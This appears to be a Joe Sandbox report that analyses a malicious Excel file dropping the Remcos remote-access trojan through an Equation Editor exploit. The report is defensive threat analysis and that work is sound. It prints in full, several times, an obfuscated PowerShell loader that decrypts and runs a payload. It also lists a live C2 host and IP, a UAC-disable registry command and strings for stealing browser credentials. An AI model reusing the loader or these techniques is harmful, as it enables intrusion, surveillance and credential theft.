Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWD 490104998518.xls

Overview

General Information

Sample name:AWD 490104998518.xls
Analysis ID:1482975
MD5:f63c009bccbc4d8d26d162a168feaeb1
SHA1:fa8ab13582703932f968a31e6cc0973e45ca43e0
SHA256:f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3
Tags:xls
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 724 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 2504 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3120 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3196 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • RegAsm.exe (PID: 3384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x14a5:$obj2: \objdata
  • 0x148f:$obj3: \objupdate
  • 0x146c:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x14a5:$obj2: \objdata
  • 0x148f:$obj3: \objupdate
  • 0x146c:$obj6: \objlink
C:\Users\user\AppData\Local\Temp\note\nots.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.powershell.exe.41fd080.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          10.2.powershell.exe.41fd080.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            10.2.powershell.exe.41fd080.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x690a8:$a1: Remcos restarted by watchdog!
            • 0x69620:$a3: %02i:%02i:%02i:%03i
            10.2.powershell.exe.41fd080.0.unpackREMCOS_RAT_variantsunknownunknown
            • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6316c:$str_b2: Executing file:
            • 0x641ec:$str_b3: GetDirectListeningPort
            • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x63d18:$str_b7: \update.vbs
            • 0x63194:$str_b9: Downloaded file:
            • 0x63180:$str_b10: Downloading file:
            • 0x63224:$str_b12: Failed to upload file:
            • 0x641b4:$str_b13: StartForward
            • 0x641d4:$str_b14: StopForward
            • 0x63c70:$str_b15: fso.DeleteFile "
            • 0x63c04:$str_b16: On Error Resume Next
            • 0x63ca0:$str_b17: fso.DeleteFolder "
            • 0x63214:$str_b18: Uploaded file:
            • 0x631d4:$str_b19: Unable to delete:
            • 0x63c38:$str_b20: while fso.FileExists("
            • 0x636b1:$str_c0: [Firefox StoredLogins not found]
            10.2.powershell.exe.41fd080.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x62f7c:$s1: CoGetObject
            • 0x62f90:$s1: CoGetObject
            • 0x62fac:$s1: CoGetObject
            • 0x6cf38:$s1: CoGetObject
            • 0x62f3c:$s2: Elevation:Administrator!new:
            Click to see the 15 entries

            Sigma Signatures

            Exploits

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internet
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.176.174, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3120, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
            Sigma detected: File Dropped By EQNEDT32EXE
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3120, TargetFilename: C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3120, Protocol: tcp, SourceIp: 192.3.176.174, SourceIsIpv6: false, SourcePort: 80
            Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Sigma detected: Potential PowerShell Command Line Obfuscation
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 